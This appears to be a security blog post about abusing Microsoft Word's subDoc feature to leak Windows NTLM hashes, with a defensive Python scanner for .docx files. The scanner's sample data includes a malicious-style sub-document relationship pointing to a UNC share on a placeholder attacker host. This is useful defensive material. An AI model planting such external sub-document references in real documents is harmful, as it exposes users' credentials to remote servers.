Rhino Labs has discovered a new way to get your Windows credentials using the subDoc feature of Microsoft Word. The bad guys insert into a Word file a sub-document that is loaded from a server out on the internet.
How does it work?
When Word loads this sub-document, the PC tries to authenticate to the remote server and gives up the NTLM hash used for authentication. Once the bad guys have this hash, they can use the passwords recovered from it to get into the compromised computer or network. About the only way to avoid this is to only open trusted Word files.
“As this feature has not been recognized publicly as an attack vector for malicious actions, it is not something that is recognized by anti-virus software,” Rhino Labs says, highlighting that none of the antivirus engines on VirusTotal detected Word documents weaponized via the subDoc method.
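A defender-side check, added here as an example (it is not code from Rhino Labs' post or from the linked injector): a .docx is a ZIP package, and a sub-document reference lives in word/_rels/document.xml.rels as a subDocument relationship; when that relationship is marked External and points at a UNC share, opening the file makes Word reach out over SMB, which is where the hash leaks. The scanner below lists such relationships; the sample rels part and the host name in it are constructed placeholders.

```python
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type that a <w:subDoc> element refers to.
SUBDOC_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/subDocument"
PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
RELS_PART = "word/_rels/document.xml.rels"


def classify_target(target):
    """Label where an external target points; a UNC/SMB target is the credential-leak case."""
    if target.startswith("\\\\") or target.startswith("//"):
        return "unc"
    if re.match(r"(?i)^file:", target):
        return "file-url"
    if re.match(r"(?i)^https?://", target):
        return "http"
    return "other"


def scan_rels(rels_xml):
    """Return [(rel_id, target, kind)] for each subDoc relationship with an external target."""
    findings = []
    root = ET.fromstring(rels_xml)
    for rel in root.iter(PKG_NS + "Relationship"):
        if rel.get("Type") != SUBDOC_REL:
            continue
        if rel.get("TargetMode", "Internal") != "External":
            continue  # sub-document stored inside the package: no outbound request
        target = rel.get("Target", "")
        findings.append((rel.get("Id"), target, classify_target(target)))
    return findings


def scan_docx(path):
    """Open a .docx (a ZIP package) and scan its main-document relationships part."""
    with zipfile.ZipFile(path) as z:
        if RELS_PART not in z.namelist():
            return []
        return scan_rels(z.read(RELS_PART))


# Constructed sample rels part: one normal internal relationship plus one external
# sub-document pointing at a UNC share (placeholder host, not a real server).
SAMPLE_RELS = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/subDocument" Target="\\\\attacker.example\\share\\sub.docx" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for rel_id, target, kind in scan_rels(SAMPLE_RELS):
        print(f"{rel_id}: external subDoc -> {target} ({kind})")
```

Run scan_docx over inbound attachments or a mail gateway's quarantine; a "unc" finding is the case this post describes, and blocking outbound SMB (TCP 445) at the perimeter stops the hash from ever leaving the network.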
I wonder if Microsoft is going to disable this feature like they did with DDE support in Word because of similar abuse by hackers?
- Microsoft Word subDoc Feature Abused to Steal Windows Credentials (bleepingcomputer.com)
- subdoc_injector.py (github.com)
- Background: Microsoft Office Exploitation (rhinosecuritylabs.com)